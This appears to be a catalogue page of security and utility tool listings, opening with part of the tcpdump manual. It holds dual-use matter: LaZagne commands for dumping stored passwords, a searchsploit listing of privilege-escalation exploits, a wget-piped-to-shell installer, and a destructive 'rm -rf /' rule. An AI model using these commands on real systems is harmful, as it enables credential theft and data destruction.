    --no-promiscuous-mode
    Don't put the interface into promiscuous mode. Note that the interface might be in promiscuous mode for some other reason; hence, `-p' cannot be used as an abbreviation for `ether host {local-hw-addr} or ether broadcast'.
    -Q direction
    --direction=direction
    Choose send/receive direction direction for which packets should be captured. Possible values are `in', `out' and `inout'. Not available on all platforms.
    -q
    Quick (quiet?) output. Print less protocol information so output lines are shorter.
    -R
    Assume ESP/AH packets to be based on old specification (RFC1825 to RFC1829). If specified, tcpdump will not print replay prevention field. Since there is no protocol version field in ESP/AH specification, tcpdump cannot deduce the version of ESP/AH protocol.
    -r file
    Read packets from file (which was created with the -w option or by other tools that write pcap or pcap-ng files). Standard input is used if file is ``-''.
    -S
    --absolute-tcp-sequence-numbers
    Print absolute, rather than relative, TCP sequence numbers.
    -s snaplen
    --snapshot-length=snaplen
    Snarf snaplen bytes of data from each packet rather than the default of 65535 bytes. Packets truncated because of a limited snapshot are indicated in the output with ``[|proto]'', where proto is the name of the protocol level at which the truncation has occurred. Note that taking larger snapshots both increases the amount of time it takes to process packets and, effectively, decreases the amount of packet buffering. This may cause packets to be lost. You should limit snaplen to the smallest number that will capture the protocol information you're interested in. Setting snaplen to 0 sets it to the default of 65535, for backwards compatibility with recent older versions of tcpdump.
    -T type
    Force packets selected by "expression" to be interpreted the specified type. Currently known types are aodv (Ad-hoc On-demand Distance Vector protocol), carp (Common Address Redundancy Protocol), cnfp (Cisco NetFlow protocol), lmp (Link Management Protocol), pgm (Pragmatic General Multicast), pgm_zmtp1 (ZMTP/1.0 inside PGM/EPGM), radius (RADIUS), rpc (Remote Procedure Call), rtp (Real-Time Applications protocol), rtcp (Real-Time Applications control protocol), snmp (Simple Network Management Protocol), tftp (Trivial File Transfer Protocol), vat (Visual Audio Tool), wb (distributed White Board), zmtp1 (ZeroMQ Message Transport Protocol 1.0) and vxlan (Virtual eXtensible Local Area Network).
    Note that the pgm type above affects UDP interpretation only, the native PGM is always recognised as IP protocol 113 regardless. UDP-encapsulated PGM is often called "EPGM" or "PGM/UDP".
    Note that the pgm_zmtp1 type above affects interpretation of both native PGM and UDP at once. During the native PGM decoding the application data of an ODATA/RDATA packet would be decoded as a ZeroMQ datagram with ZMTP/1.0 frames. During the UDP decoding in addition to that any UDP packet would be treated as an encapsulated PGM packet.
    -t
    Don't print a timestamp on each dump line.
    -tt
    Print the timestamp, as seconds since January 1, 1970, 00:00:00, UTC, and fractions of a second since that time, on each dump line.
    -ttt
    Print a delta (micro-second resolution) between current and previous line on each dump line.
    -tttt
    Print a timestamp, as hours, minutes, seconds, and fractions of a second since midnight, preceded by the date, on each dump line.
    -ttttt
    Print a delta (micro-second resolution) between current and first line on each dump line.
    -u
    Print undecoded NFS handles.
    -U
    --packet-buffered
    If the -w option is not specified, make the printed packet output ``packet-buffered''; i.e., as the description of the contents of each packet is printed, it will be written to the standard output, rather than, when not writing to a terminal, being written only when the output buffer fills.
    If the -w option is specified, make the saved raw packet output ``packet-buffered''; i.e., as each packet is saved, it will be written to the output file, rather than being written only when the output buffer fills.
    The -U flag will not be supported if tcpdump was built with an older version of libpcap that lacks the pcap_dump_flush() function.
    -v
    When parsing and printing, produce (slightly more) verbose output. For example, the time to live, identification, total length and options in an IP packet are printed. Also enables additional packet integrity checks such as verifying the IP and ICMP header checksum.
    When writing to a file with the -w option, report, every 10 seconds, the number of packets captured.
    -vv
    Even more verbose output. For example, additional fields are printed from NFS reply packets, and SMB packets are fully decoded.
    -vvv
    Even more verbose output. For example, telnet SB ... SE options are printed in full. With -X Telnet options are printed in hex as well.
    -V file
    Read a list of filenames from file. Standard input is used if file is ``-''.
    -w file
    Write the raw packets to file rather than parsing and printing them out. They can later be printed with the -r option. Standard output is used if file is ``-''.
    This output will be buffered if written to a file or pipe, so a program reading from the file or pipe may not see packets for an arbitrary amount of time after they are received. Use the -U flag to cause packets to be written as soon as they are received.
    The MIME type application/vnd.tcpdump.pcap has been registered with IANA for pcap files. The filename extension .pcap appears to be the most commonly used along with .cap and .dmp. Tcpdump itself doesn't check the extension when reading capture files and doesn't add an extension when writing them (it uses magic numbers in the file header instead). However, many operating systems and applications will use the extension if it is present and adding one (e.g. .pcap) is recommended.
    See pcap-savefile(5) for a description of the file format.
    -W
    Used in conjunction with the -C option, this will limit the number of files created to the specified number, and begin overwriting files from the beginning, thus creating a 'rotating' buffer. In addition, it will name the files with enough leading 0s to support the maximum number of files, allowing them to sort correctly.
    Used in conjunction with the -G option, this will limit the number of rotated dump files that get created, exiting with status 0 when reaching the limit. If used with -C as well, the behavior will result in cyclical files per timeslice.
    -x
    When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex. The smaller of the entire packet or snaplen bytes will be printed. Note that this is the entire link-layer packet, so for link layers that pad (e.g. Ethernet), the padding bytes will also be printed when the higher layer packet is shorter than the required padding.
    -xx
    When parsing and printing, in addition to printing the headers of each packet, print the data of each packet, including its link level header, in hex.
    -X
    When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex and ASCII. This is very handy for analysing new protocols.
    -XX
    When parsing and printing, in addition to printing the headers of each packet, print the data of each packet, including its link level header, in hex and ASCII.
    -y datalinktype
    --linktype=datalinktype
    Set the data link type to use while capturing packets to datalinktype.
    -z postrotate-command
    Used in conjunction with the -C or -G options, this will make tcpdump run " postrotate-command file " where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.
    Note that tcpdump will run the command in parallel to the capture, using the lowest priority so that this doesn't disturb the capture process.
    And in case you would like to use a command that itself takes flags or different arguments, you can always write a shell script that will take the savefile name as the only argument, make the flags & arguments arrangements and execute the command that you want.
    -Z user
    --relinquish-privileges=user
    If tcpdump is running as root, after opening the capture device or input savefile, but before opening any savefiles for output, change the user ID to user and the group ID to the primary group of user.
    This behavior can also be enabled by default at compile time.
    expression
    selects which packets will be dumped. If no expression is given, all packets on the net will be dumped. Otherwise, only packets for which expression is `true' will be dumped. For the expression syntax, see pcap-filter(7).
    The expression argument can be passed to tcpdump as either a single Shell argument, or as multiple Shell arguments, whichever is more convenient. Generally, if the expression contains Shell metacharacters, such as backslashes used to escape protocol names, it is easier to pass it as a single, quoted argument rather than to escape the Shell metacharacters. Multiple arguments are concatenated with spaces before being parsed.
     

    EXAMPLES

    To print all packets arriving at or departing from sundown:
    tcpdump host sundown
    To print traffic between helios and either hot or ace:
    tcpdump host helios and \( hot or ace \)
    To print all IP packets between ace and any host except helios:
    tcpdump ip host ace and not helios
    To print all traffic between local hosts and hosts at Berkeley:
    tcpdump net ucb-ether
    To print all ftp traffic through internet gateway snup: (note that the expression is quoted to prevent the shell from (mis-)interpreting the parentheses):
    tcpdump 'gateway snup and (port ftp or ftp-data)'
    To print traffic neither sourced from nor destined for local hosts (if you gateway to one other net, this stuff should never make it onto your local net).
    tcpdump ip and not net localnet
    To print the start and end packets (the SYN and FIN packets) of each TCP conversation that involves a non-local host.
    tcpdump 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0 and not src and dst net localnet'
    To print all IPv4 HTTP packets to and from port 80, i.e. print only packets that contain data, not, for example, SYN and FIN packets and ACK-only packets. (IPv6 is left as an exercise for the reader.)
    tcpdump 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
    To print IP packets longer than 576 bytes sent through gateway snup:
    tcpdump 'gateway snup and ip[2:2] > 576'
    To print IP broadcast or multicast packets that were not sent via Ethernet broadcast or multicast:
    tcpdump 'ether[0] & 1 = 0 and ip[16] >= 224'
    To print all ICMP packets that are not echo requests/replies (i.e., not ping packets):
    tcpdump 'icmp[icmptype] != icmp-echo and icmp[icmptype] != icmp-echoreply'


    Download Tcpdump

    TeemIp - IP Address Management Solution


    All network administrators do recognize how important it is to have a well managed IP space: a comprehensive and up to date inventory of all subnets and IPs used in a network as well as clear and simple processes to request, change or release IPs are underlying key factors for a trouble free network.

    Unfortunately, in many companies or organizations, IP Management is not perceived as a critical service of IT operations. And when it is recognized as such, the price of standard solutions sold from software vendors is so high that investment in a tool is always postponed to the next fiscal exercise.

    As a consequence, network administrators often struggle to keep a decent inventory of their IP space and they rely by default on inconvenient Excel spread sheets or DNS configuration files to do their job.

    TeemIp application has been created to precisely answer that problematic. It is a robust Open Source web 2.0 solution that enables professional IP Management activity within IT departments of all size.

    A simple and powerful user interface will allow network administrators to manage their IPv4 and IPv6 Plans, subnet space and IPs in accordance with best in class IP Management practices:
    • Define your IPv4 and IPv6 Plans through hierarchical Network Blocks
    • Delegate IP blocks from parent to child organizations
    • Manage Subnets within predefined Network Blocks
    • Attach IP Ranges to your Subnets
    • Register IPs and get a clear view on the IP space consumption
    • Allow end user to log IP requests through a simple WEB portal
    • Provide Hostmasters efficient processes to manage user requests
    • Proactively notify administrators on key events
    • Synchronize your data with external tools

    Because IPs are configured on network devices, a CMDB (Configuration Management Data Base) has been included in the product. This CMDB allows you to document all types of devices that can be connected to an IP network together with their linkage toward the IP space (IPs they use, like management IPs, or IPs they host, like on router interfaces).

    In order to provide to the end users an easy way to log IP related requests, a WEB portal has been incorporated to TeemIp. Tickets created through that portal are then processed through a Helpdesk module thus providing to the network administrator a quick, efficient and easy process to allocate, change or release IP resources.

    TeemIp has been developped as an extension of iTop open source ITSM and CMDB software and therefore benefits from all its features and advanced functions. It is available as a standalone application or as a module that can be installed on an already working iTop solution.

    TeemIp application is relying on Apache, MySQL and PHP, so it can run on whatever operating system supporting those applications: it has been already tested on Windows, Linux Debian and Redhat. Because it is a web based application you don’t need to install any client on user PC. A simple web browser is enough to use it.


    TestDisk - Partition Recovery and File Undelete for Windows, Linux and Mac



    TestDisk is powerful free data recovery software! It was primarily designed to help recover lost partitions and/or make non-booting disks bootable again when these symptoms are caused by faulty software: certain types of viruses or human error (such as accidentally deleting a Partition Table). Partition table recovery using TestDisk is really easy.

    TestDisk can:
    • Fix partition table, recover deleted partition
    • Recover FAT32 boot sector from its backup
    • Rebuild FAT12/FAT16/FAT32 boot sector
    • Fix FAT tables
    • Rebuild NTFS boot sector
    • Recover NTFS boot sector from its backup
    • Fix MFT using MFT mirror
    • Locate ext2/ext3/ext4 Backup SuperBlock
    • Undelete files from FAT, exFAT, NTFS and ext2 filesystem
    • Copy files from deleted FAT, exFAT, NTFS and ext2/ext3/ext4 partitions.
    TestDisk has features for both novices and experts. For those who know little or nothing about data recovery techniques, TestDisk can be used to collect detailed information about a non-booting drive which can then be sent to a tech for further analysis. Those more familiar with such procedures should find TestDisk a handy tool in performing onsite recovery.

    Operating systems 

    TestDisk can run under
    • DOS (either real or in a Windows 9x DOS-box),
    • Windows (NT4, 2000, XP, 2003, Vista, 2008, Windows 7 (x86 & x64),
    • Linux,
    • FreeBSD, NetBSD, OpenBSD,
    • SunOS and
    • MacOS X

    Filesystems

    TestDisk can find lost partitions for all of these file systems:
    • BeFS ( BeOS )
    • BSD disklabel ( FreeBSD/OpenBSD/NetBSD )
    • CramFS, Compressed File System
    • DOS/Windows FAT12, FAT16 and FAT32
    • XBox FATX
    • Windows exFAT
    • HFS, HFS+ and HFSX, Hierarchical File System
    • JFS, IBM's Journaled File System
    • Linux btrfs
    • Linux ext2, ext3 and ext4
    • Linux GFS2
    • Linux LUKS encrypted partition
    • Linux RAID md 0.9/1.0/1.1/1.2
      • RAID 1: mirroring
      • RAID 4: striped array with parity device
      • RAID 5: striped array with distributed parity information
      • RAID 6: striped array with distributed dual redundancy information
    • Linux Swap (versions 1 and 2)
    • LVM and LVM2, Linux Logical Volume Manager
    • Mac partition map
    • Novell Storage Services NSS
    • NTFS ( Windows NT/2000/XP/2003/Vista/2008/7 )
    • ReiserFS 3.5, 3.6 and 4
    • Sun Solaris i386 disklabel
    • Unix File System UFS and UFS2 (Sun/BSD/...)
    • XFS, SGI's Journaled File System
    • Wii WBFS
    • Sun ZFS

    Download TestDisk

    The Exploit-Database Git Repository


    This is the official repository of The Exploit Database, a project sponsored by Offensive Security.

    The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away.

    This repository is updated daily with the most recently added submissions.

    Included with this repository is the searchsploit utility, which will allow you to search through the exploits using one or more terms.

    root@kali:~# searchsploit -h
    Usage  : searchsploit [OPTIONS] term1 [term2] ... [termN]
    Example: searchsploit oracle windows local
    
    =========
     OPTIONS
    =========
     -c         - Perform case-sensitive searches; by default,
                  searches will try to be greedy
     -v         - By setting verbose output, description lines
                  are allowed to overflow their columns
     -h, --help - Show help screen
    
    NOTES:
     - Use any number of search terms you would like (minimum: 1)
     - Search terms are not case sensitive, and order is irrelevant
    
    root@kali:~# searchsploit afd windows local
    ----------------------------------------------------------------|----------------------------------
    Description                                                     |  Path
    ----------------------------------------------------------------|----------------------------------
    MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plug | /windows/local/6757.txt
    Microsoft Windows xp AFD.sys Local Kernel DoS Exploit           | /windows/dos/17133.c
    Windows XP/2003 Afd.sys - Local Privilege Escalation Exploit (M | /windows/local/18176.py
    Windows - AfdJoinLeaf Privilege Escalation (MS11-080)           | /windows/local/21844.rb
    ----------------------------------------------------------------|----------------------------------
    root@kali:~#
    


    Download The Exploit-Database Git Repository

    The LaZagne Project - Recover most common software passwords (Firefox, IE, Opera, Chrome, Filezilla, winscp, coreFTP, WiFi and many more)


    The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different technics (plaintext, using api, custom algorithms, etc.). This tool has been developped to find these passwords for most common softwares. At this moment, it supports 22 softwares on windows and 12 on a linux plateform.

    Usage
    • Launch all modules
      • cmd: laZagne.exe all
    • Launch only a specific module
      • cmd: laZagne.exe
      • example: laZagne.exe browsers
      • help: laZagne.exe -h
    • Launch only a specific software script
      • cmd: laZagne.exe
      • example: laZagne.exe browsers -f
      • help: laZagne.exe browsers -h
    • Write all passwords found into a file (-w options)
      • cmd: laZagne.exe all -w

    Supported softwares
    • Windows (tested on Windows XP, 7 and 8 - 32 and 64 bits)
      • browsers
        • firefox
        • chrome
        • opera
        • ie
      • chats
        • skype
        • pidgin
        • jitsi
      • mails
        • thunderbird
        • outlook
      • adminsys
        • filezilla
        • puttycm
        • winscp
        • cyberduck
        • coreFTP
        • FTPNavigator
      • database
        • sqldeveloper
        • squirrel
        • dbvisualizer
      • svn
        • tortoise
      • wifi
        • Wireless Network Password (Windows mechanism)
      • windows credentials
        • Domain visible network (.Net Passport)
        • Generic network credentials
    • Linux
      • browsers
        • firefox
        • opera
      • chats
        • pidgin
        • jitsi
      • mails
        • thunderbird
      • adminsys
        • filezilla
        • environment variables
      • database
        • sqldeveloper
        • squirrel
        • dbvisualizer
      • wifi
        • network manager
      • wallet
        • gnome keyring


    IE Browser history

    Internet Explorer passwords (from ie7 and before windows 8) can only be decrypted using the URL of the website. This one is used as an argument of the Win32CryptUnprotectData api. So to decrypt it, it is necessary to retreive the browser history of ie. To do that, I have used C code. So I used a dll (the code is on on the "browser_history_dll" directory) and it is directly embedded to the python code as a base64 string (c.f. ie.py). Once launched, the dll is written to the disk, a wrapper is used to call dll functions and then the dll file is removed from the disk.


    Build your own password recovery script

    It is possible to write your own script for the software of your choice.
    To do that, some syntax requirements are needed:
    • Create a class using the name of the software
    • This class has to have a function called "retrieve_password" (it will be the main function)
    • The output containing all passwords has to be send to the "print_output" function - ex: print_output(, password_list)
      • password_list has to be an array of dictionnaries.
    • Optional: you could use the function "print_debug" to print your output
      • ex: print_debug("ERROR", "Failed to load ...")
    • Use an existing script to understand what I have said :)
    If you want to improve this tool, you could send me your script and it will be added to this project (authors will be of course credited on each script ;)).

    Requirements

    To compile the source code, some external library are required.



    Download The LaZagne Project

    The Penetration Testers Framework (PTF) - Is a Way for Modular Support for Up-to-date Tools


    A TrustedSec Project - The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

    PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

    The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute.

    Instructions: 

    First check out the config/ptf.config file which contains the base location of where to install everything. By default this will install in the /pentest directory. Once you have that configured, move to running PTF by typing ./ptf (or python ptf).

    This will put you in a Metasploitesk type shell which has a similar look and feel for consistency. Show modules, use , etc. are all accepted commands. First things first, always type help or ? to see a full list of commands.

    Update EVERYTHING!

    If you want to install and/or update everything, simply do the following:
    ./ptf
    use modules/install_update_all
    run

    This will install all of the tools inside of PTF. If they are already installed, this will iterate through and update everything for you automatically.

    You can also show options to change information about the modules.

    Modules:

    First, head over to the modules/ directory, inside of there are sub directories based on the Penetration Testing Execution Standard (PTES) phases. Go into those phases and look at the different modules. As soon as you add a new one, for example testing.py, it will automatically be imported next time you launch PTF. There are a few key components when looking at a module that must be completed.

    Below is a sample module

    Module Development:

    All of the fields are pretty easy, on the repository locations, right now all thats supported is GIT. The plan in the next release is to expand to file downloader. This can still be accomplished through after commands (explained later). Fill in the depends, and where you want the install location to be. PTF will take where the python file is located (for example exploitation) and move it to what you specify in the PTF config (located under config). By default it installs all your tools to /pentest//
    Note in modules, you can specify after commands {INSTALL_LOCATION}. This will append where you want the install location to go when using after commands.

    After Commands:

    After commands are commands that you can insert after an installation. This could be switching to a directory and kicking off additional commands to finish the installation. For example in the BEEF scenario, you need to run ruby install-beef afterwards. Below is an example of after commands using the {INSTALL_LOCATION} flag.
    AFTER_COMMANDS="cp config/dict/rockyou.txt {INSTALL_LOCATION}"

    For AFTER_COMMANDS that do self install (don't need user interaction) - place an exit after your commands so it exits the shell.


    Download The Penetration Testers Framework

    TheFuck - Magnificent App Which Corrects Your Previous Console Command


    Few examples:
    ➜ apt-get install vim
    E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
    E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?
    
    ➜ fuck
    sudo apt-get install vim [enter/↑/↓/ctrl+c]
    [sudo] password for nvbn:
    Reading package lists... Done
    ...

    ➜ git push
    fatal: The current branch master has no upstream branch.
    To push the current branch and set the remote as upstream, use
    
        git push --set-upstream origin master
    
    
    ➜ fuck
    git push --set-upstream origin master [enter/↑/↓/ctrl+c]
    Counting objects: 9, done.
    ...
    ➜ puthon
    No command 'puthon' found, did you mean:
     Command 'python' from package 'python-minimal' (main)
     Command 'python' from package 'python3' (main)
    zsh: command not found: puthon
    
    ➜ fuck
    python [enter/↑/↓/ctrl+c]
    Python 3.4.2 (default, Oct  8 2014, 13:08:17)
    ...
    ➜ git brnch
    git: 'brnch' is not a git command. See 'git --help'.
    
    Did you mean this?
        branch
    
    ➜ fuck
    git branch [enter/↑/↓/ctrl+c]
    * master
    ➜ lein rpl
    'rpl' is not a task. See 'lein help'.
    
    Did you mean this?
             repl
    
    ➜ fuck
    lein repl [enter/↑/↓/ctrl+c]
    nREPL server started on port 54848 on host 127.0.0.1 - nrepl://127.0.0.1:54848
    REPL-y 0.3.1
    ...
    If you are not scared to blindly run the changed command, there is a require_confirmation settings option:
    ➜ apt-get install vim
    E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
    E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?
    
    ➜ fuck
    sudo apt-get install vim
    [sudo] password for nvbn:
    Reading package lists... Done
    ...

    Requirements
    • python (2.7+ or 3.3+)
    • pip
    • python-dev

    Installation [ experimental ]
    On Ubuntu and OS X you can install The Fuck with installation script:
    wget -O - https://raw.githubusercontent.com/nvbn/thefuck/master/install.sh | sh - && $0

    Manual installation
    Install The Fuck with pip :
    sudo pip install thefuck
    Or using an OS package manager (OS X, Ubuntu, Arch).
    You should place this command in your .bash_profile , .bashrc , .zshrc or other startup script:
    eval "$(thefuck --alias)"
    # You can use whatever you want as an alias, like for Mondays:
    eval "$(thefuck --alias FUCK)"
    Or in your shell config (Bash, Zsh, Fish, Powershell, tcsh).
    Changes will be available only in a new shell session. To make them available immediately, run source ~/.bashrc (or your shell config file like .zshrc ).

    Update
    sudo pip install thefuck --upgrade
    Aliases changed in 1.34.

    How it works
    The Fuck tries to match a rule for the previous command, creates a new command using the matched rule and runs it. Rules enabled by default are as follows:
    • cargo – runs cargo build instead of cargo ;
    • cargo_no_command – fixes wrongs commands like cargo buid ;
    • cd_correction – spellchecks and correct failed cd commands;
    • cd_mkdir – creates directories before cd'ing into them;
    • cd_parent – changes cd.. to cd .. ;
    • composer_not_command – fixes composer command name;
    • cp_omitting_directory – adds -a when you cp directory;
    • cpp11 – adds missing -std=c++11 to g++ or clang++ ;
    • dirty_untar – fixes tar x command that untarred in the current directory;
    • dirty_unzip – fixes unzip command that unzipped in the current directory;
    • django_south_ghost – adds --delete-ghost-migrations to failed because ghosts django south migration;
    • django_south_merge – adds --merge to inconsistent django south migration;
    • docker_not_command – fixes wrong docker commands like docker tags ;
    • dry – fixes repetitions like git git push ;
    • fix_alt_space – replaces Alt+Space with Space character;
    • fix_file – opens a file with an error in your $EDITOR ;
    • git_add – fixes "Did you forget to 'git add'?" ;
    • git_branch_delete – changes git branch -d to git branch -D ;
    • git_branch_list – catches git branch list in place of git branch and removes created branch;
    • git_checkout – fixes branch name or creates new branch;
    • git_diff_staged – adds --staged to previous git diff with unexpected output;
    • git_fix_stash – fixes git stash commands (misspelled subcommand and missing save );
    • git_not_command – fixes wrong git commands like git brnch ;
    • git_pull – sets upstream before executing previous git pull ;
    • git_pull_clone – clones instead of pulling when the repo does not exist;
    • git_push – adds --set-upstream origin $branch to previous failed git push ;
    • git_push_pull – runs git pull when push was rejected;
    • git_stash – stashes you local modifications before rebasing or switching branch;
    • git_two_dashes – adds a missing dash to commands like git commit -amend or git rebase -continue ;
    • go_run – appends .go extension when compiling/running Go programs
    • grep_recursive – adds -r when you trying to grep directory;
    • gulp_not_task – fixes misspelled gulp tasks;
    • has_exists_script – prepends ./ when script/binary exists;
    • heroku_not_command – fixes wrong heroku commands like heroku log ;
    • history – tries to replace command with most similar command from history;
    • java – removes .java extension when running Java programs;
    • javac – appends missing .java when compiling Java files;
    • lein_not_task – fixes wrong lein tasks like lein rpl ;
    • ls_lah – adds -lah to ls ;
    • man – changes manual section;
    • man_no_space – fixes man commands without spaces, for example mandiff ;
    • mercurial – fixes wrong hg commands;
    • mkdir_p – adds -p when you trying to create directory without parent;
    • mvn_no_command – adds clean package to mvn ;
    • mvn_unknown_lifecycle_phase – fixes misspelled lifecycle phases with mvn ;
    • no_command – fixes wrong console commands, for example vom/vim ;
    • no_such_file – creates missing directories with mv and cp commands;
    • open – prepends http to address passed to open ;
    • pip_unknown_command – fixes wrong pip commands, for example pip instatl/pip install ;
    • python_command – prepends python when you trying to run not executable/without ./ python script;
    • python_execute – appends missing .py when executing Python files;
    • quotation_marks – fixes uneven usage of ' and " when containing args';
    • rm_dir – adds -rf when you trying to remove directory;
    • sed_unterminated_s – adds missing '/' to sed 's s commands;
    • sl_ls – changes sl to ls ;
    • ssh_known_hosts – removes host from known_hosts on warning;
    • sudo – prepends sudo to previous command if it failed because of permissions;
    • switch_lang – switches command from your local layout to en;
    • systemctl – correctly orders parameters of confusing systemctl ;
    • test.py – runs py.test instead of test.py ;
    • touch – creates missing directories before "touching";
    • tsuru_login – runs tsuru login if not authenticated or session expired;
    • tsuru_not_command – fixes wrong tsuru commands like tsuru shell ;
    • tmux – fixes tmux commands;
    • unknown_command – fixes hadoop hdfs-style "unknown command", for example adds missing '-' to the command on hdfs dfs ls ;
    • vagrant_up – starts up the vagrant instance;
    • whois – fixes whois command.
    Enabled by default only on specific platforms:
    • apt_get – installs app from apt if it not installed (requires python-commandnotfound / python3-commandnotfound );
    • apt_get_search – changes trying to search using apt-get with searching using apt-cache ;
    • brew_install – fixes formula name for brew install ;
    • brew_unknown_command – fixes wrong brew commands, for example brew docto/brew doctor ;
    • brew_upgrade – appends --all to brew upgrade as per Homebrew's new behaviour;
    • pacman – installs app with pacman if it is not installed (uses yaourt if available);
    • pacman_not_found – fixes package name with pacman or yaourt .
    Bundled, but not enabled by default:
    • git_push_force – adds --force to a git push (may conflict with git_push_pull );
    • rm_root – adds --no-preserve-root to rm -rf / command.

    Creating your own rules
    For adding your own rule you should create your-rule-name.py in ~/.thefuck/rules . The rule should contain two functions:
    match(command: Command) -> bool
    get_new_command(command: Command) -> str | list[str]
    Also the rule can contain an optional function
    side_effect(old_command: Command, fixed_command: str) -> None
    and optional enabled_by_default , requires_output and priority variables.
    Command has three attributes: script , stdout and stderr .
    Rules api changed in 3.0: For accessing settings in rule you need to import it with from thefuck.conf import settings . settings is a special object filled with ~/.thefuck/settings.py and values from env ( see more below ).
    Simple example of the rule for running script with sudo :
    def match(command):
        return ('permission denied' in command.stderr.lower()
                or 'EACCES' in command.stderr)
    
    
    def get_new_command(command):
        return 'sudo {}'.format(command.script)
    
    # Optional:
    enabled_by_default = True
    
    def side_effect(command, fixed_command):
        subprocess.call('chmod 777 .', shell=True)
    
    priority = 1000  # Lower first, default is 1000
    
    requires_output = True
    More examples of rules , utility functions for rules , app/os-specific helpers .

    Settings
    The Fuck has a few settings parameters which can be changed in ~/.thefuck/settings.py :
    • rules – list of enabled rules, by default thefuck.conf.DEFAULT_RULES ;
    • exclude_rules – list of disabled rules, by default [] ;
    • require_confirmation – requires confirmation before running new command, by default True ;
    • wait_command – max amount of time in seconds for getting previous command output;
    • no_colors – disable colored output;
    • priority – dict with rules priorities, rule with lower priority will be matched first;
    • debug – enables debug output, by default False .
    Example of settings.py :
    rules = ['sudo', 'no_command']
    exclude_rules = ['git_push']
    require_confirmation = True
    wait_command = 10
    no_colors = False
    priority = {'sudo': 100, 'no_command': 9999}
    debug = False
    Or via environment variables:
    • THEFUCK_RULES – list of enabled rules, like DEFAULT_RULES:rm_root or sudo:no_command ;
    • THEFUCK_EXCLUDE_RULES – list of disabled rules, like git_pull:git_push ;
    • THEFUCK_REQUIRE_CONFIRMATION – require confirmation before running new command, true/false ;
    • THEFUCK_WAIT_COMMAND – max amount of time in seconds for getting previous command output;
    • THEFUCK_NO_COLORS – disable colored output, true/false ;
    • THEFUCK_PRIORITY – priority of the rules, like no_command=9999:apt_get=100 , rule with lower priority will be matched first;
    • THEFUCK_DEBUG – enables debug output, true/false .
    For example:
    export THEFUCK_RULES='sudo:no_command'
    export THEFUCK_EXCLUDE_RULES='git_pull:git_push'
    export THEFUCK_REQUIRE_CONFIRMATION='true'
    export THEFUCK_WAIT_COMMAND=10
    export THEFUCK_NO_COLORS='false'
    export THEFUCK_PRIORITY='no_command=9999:apt_get=100'

    Developing
    Install The Fuck for development:
    pip install -r requirements.txt
    python setup.py develop
    Run unit tests:
    py.test
    Run unit and functional tests (requires docker):
    py.test --enable-functional
    For sending package to pypi:
    sudo apt-get install pandoc
    ./release.py


    Download Thefuck

    Tiger - The Unix security audit and intrusion detection tool


    Tiger is a security tool that can be use both as a security audit and intrusion detection system. It supports multiple UNIX platforms and it is free and provided under a GPL license. Unlike other tools, Tiger needs only of POSIX tools and is written entirely in shell language.

    Tiger has some interesting features that merit its resurrection, including a modular design that is easy to expand, and its double edge, it can be used as an audit tool and a host intrusion detection system tool. Free Software intrusion detection is currently going many ways, from network IDS (with Snort), to the kernel (LIDS, or SNARE for Linux and Systrace for OpenBSD, for example), not mentioning file integrity checkers (many of these: aide, integrit samhain, tripwire...) and logcheckers (even more of these, check the Log Analysis pages). But few of them focus on the host-side of intrusion detection fully. Tiger complements this tools and also provides a framework in which all of them can work together. Tiger it is not a logchecker, nor it focused in integrity analysis. It does "the other stuff", it checks the system configuration and status. Read the manpage for a full description of checks implemented in Tiger. A good example of what Tiger can do is, for example, check_findeleted, a module that can determine which network servers running in a system are using deleted files (because libraries were patched during an upgrade but the server's services not restarted).

    Installation
    sudo apt-get install tiger


    Download Tiger

    Tor Browser 4.5 - Everything you Need to Safely Browse the Internet


    The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked.

    The Tor Browser lets you use Tor on Windows, Mac OS X, or Linux without needing to install any software. It can run off a USB flash drive, comes with a pre-configured web browser to protect your anonymity, and is self-contained.

    The 4.5 series provides significant usability, security, and privacy enhancements over the 4.0 series. Because these changes are significant, we will be delaying the automatic update of 4.0 users to the 4.5 series for one week.

    Usability Improvements

    On the usability front, we've improved the application launch experience for both Windows and Linux users. During install, Windows users are now given the choice to add Tor Browser to the Start Menu/Applications view, which should make it easier to find and launch. This choice is on by default, but can be disabled, and only affects the creation of shortcuts - the actual Tor Browser is still self-contained as a portable app folder. On the Linux side, users now start Tor Browser through a new wrapper that enables launching from the File Manager, the Desktop, or the Applications menu. The same wrapper can also be used from the command line.
    We've also simplified the Tor menu (the green onion) and the associated configuration windows. The menu now provides information about the current Tor Circuit in use for a page, and also provides an option to request a new Tor Circuit for a site. Tor Browser is also much better at handling Tor Circuits in general: while a site remains in active use, all associated requests will continue to be performed over the same Tor Circuit. This means that sites should no longer suddenly change languages, behaviors, or log you out while you are using them.

